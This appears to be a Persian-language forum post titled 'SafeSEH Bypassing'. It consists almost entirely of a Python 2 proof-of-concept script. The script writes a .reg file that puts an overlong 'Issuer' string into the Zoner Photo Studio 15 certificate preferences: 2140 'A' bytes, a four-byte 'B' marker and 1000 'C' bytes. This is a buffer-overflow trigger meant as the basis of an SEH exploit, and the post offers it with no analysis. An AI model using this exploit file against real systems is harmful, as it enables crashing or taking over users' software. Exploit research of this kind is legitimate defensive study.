SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

SafeSEH Bypassing

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • SafeSEH Bypassing

    [php]

    #!/usr/bin/python

    file="poc.reg"

    junk1="\x41" * 2140
    boom="\x42\x42\x42\x42"
    junk2="\x43" * 1000

    poc="Windows Registry Editor Version 5.00\n\n"
    poc=poc + "[HKEY_CURRENT_USER\Software\ZONER\Zoner Photo Studio 15\Preferences\Certificate]\n"
    poc=poc + "\"Issuer\"=\"" + junk1 + boom + junk2 + "\""

    try:
    print "[*] Creating exploit file...\n";
    writeFile = open (file, "w")
    writeFile.write( poc )
    writeFile.close()
    print "[*] File successfully created!";
    except:
    print "[!] Error while creating file!";

    [/php]
صبر کنید ..
X